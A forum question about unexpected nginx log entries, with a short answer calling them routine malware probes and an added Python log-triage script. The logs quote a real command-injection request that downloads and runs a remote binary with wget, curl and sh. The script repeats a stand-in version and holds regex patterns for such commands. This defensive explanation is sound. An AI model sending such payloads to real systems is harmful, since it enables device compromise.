Nginx automatically forwards domains that I did not configure

I set up a new server on DigitalOcean. I forgot to activate the firewall for a day, and then I checked the nginx logs and saw the following lines:

120.216.207.173 - - [11/Dec/2019:01:42:29 +0000] "GET http://ah.sina.com.cn/ HTTP/1.1" 200 612 "http://ah.sina.com.cn/" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
185.53.88.5 - - [11/Dec/2019:02:07:44 +0000] "GET //admin/config.php?password%5B0%5D=ZIZO&username=admin HTTP/1.1" 400 37 "-" "python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1062.4.3.el7.x86_64"
94.102.49.104 - - [11/Dec/2019:02:13:57 +0000] "GET ../../proc/ HTTP" 400 173 "-" "-"
120.216.207.173 - - [11/Dec/2019:02:52:07 +0000] "GET http://www.jaycn.com/ HTTP/1.1" 200 612 "http://www.jaycn.com/" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
120.216.207.173 - - [11/Dec/2019:02:52:15 +0000] "GET http://www.enet.com.cn/ HTTP/1.1" 200 612 "http://www.enet.com.cn/" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
120.216.207.173 - - [11/Dec/2019:02:52:19 +0000] "GET http://www.rising.cn/ HTTP/1.1" 200 612 "http://www.rising.cn/" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
208.97.139.112 - - [11/Dec/2019:02:52:46 +0000] "POST /stainfo.cgi?ifname=eth0;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0" 404 169 "-" "-"
120.216.207.173 - - [11/Dec/2019:03:27:29 +0000] "GET http://www.xinhuanet.com/ HTTP/1.1" 200 612 "http://www.xinhuanet.com/" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
120.216.207.173 - - [11/Dec/2019:04:21:33 +0000] "GET http://blog.sina.com.cn/ HTTP/1.1" 200 612 "http://blog.sina.com.cn/" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
120.216.207.173 - - [11/Dec/2019:04:21:36 +0000] "GET http://www.guokr.com/ HTTP/1.1" 200 612 "http://www.guokr.com/" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
120.216.207.173 - - [11/Dec/2019:04:21:41 +0000] "GET http://www.ecitic.com/ HTTP/1.1" 200 612 "http://www.ecitic.com/" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"

I would like to know how my nginx can be returning domains that I have not configured. Does this mean nginx has been hacked?

Answer 1

These are just exploitation attempts by malware; this is very common and normal.

The IP address indicates that this is malware: https://twitter.com/carbreal/status/1205059129619947520/photo/3
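
An added example, not part of the original question or answer: a small Python triage script for access-log lines like those in the question. The sample lines are constructed (documentation address ranges and `.example` hosts), and the label names and the 200-size heuristic are this example's own assumptions.

```python
import re
from collections import Counter

# nginx "combined" format: addr - user [time] "request" status bytes "referer" "agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<req>.*)" '
    r'(?P<status>\d{3}) (?P<size>\d+) "[^"]*" "[^"]*"$')
# Shell metacharacter followed by a downloader/interpreter, or $( substitution.
INJECTION_RE = re.compile(r'[;|`]\s*(?:wget|curl|chmod|sh|bash)\b|\$\(')

def classify(request):
    """Label one logged request line by what the client was probing for."""
    _method, _, rest = request.partition(" ")
    proto = re.search(r' HTTP/\d\.\d$', rest)
    target = rest[:proto.start()] if proto else rest
    if re.match(r'https?://', target, re.I):
        return "proxy-probe"        # absolute-URI target: open-proxy check
    if INJECTION_RE.search(target):
        return "command-injection"
    if "../" in target:
        return "path-traversal"
    return "other" if proto else "malformed"

def triage(lines):
    """Return (ip, label, status, size) for every parseable log line."""
    rows = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            rows.append((m["ip"], classify(m["req"]),
                         int(m["status"]), int(m["size"])))
    return rows

def proxy_probe_sizes(rows):
    """Body sizes of proxy probes answered 200. A single size repeated across
    different hosts suggests one local page was served, not proxied content."""
    return Counter(size for _, label, status, size in rows
                   if label == "proxy-probe" and status == 200)

# Constructed sample lines modelled on the log in the question.
SAMPLE = [
    '203.0.113.10 - - [11/Dec/2019:01:42:29 +0000] "GET http://site-a.example/ HTTP/1.1" 200 612 "http://site-a.example/" "Mozilla/5.0"',
    '203.0.113.10 - - [11/Dec/2019:02:52:07 +0000] "GET http://site-b.example/ HTTP/1.1" 200 612 "http://site-b.example/" "Mozilla/5.0"',
    '198.51.100.20 - - [11/Dec/2019:02:52:46 +0000] "POST /stainfo.cgi?ifname=eth0;wget http://192.0.2.1/x; sh x HTTP/1.0" 404 169 "-" "-"',
    '198.51.100.30 - - [11/Dec/2019:02:13:57 +0000] "GET ../../proc/ HTTP" 400 173 "-" "-"',
    '198.51.100.40 - - [11/Dec/2019:02:07:44 +0000] "GET //admin/config.php?username=admin HTTP/1.1" 400 37 "-" "python-requests/2.6.0"',
]
if __name__ == "__main__":
    for row in triage(SAMPLE):
        print(row)
    print(proxy_probe_sizes(triage(SAMPLE)))
```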
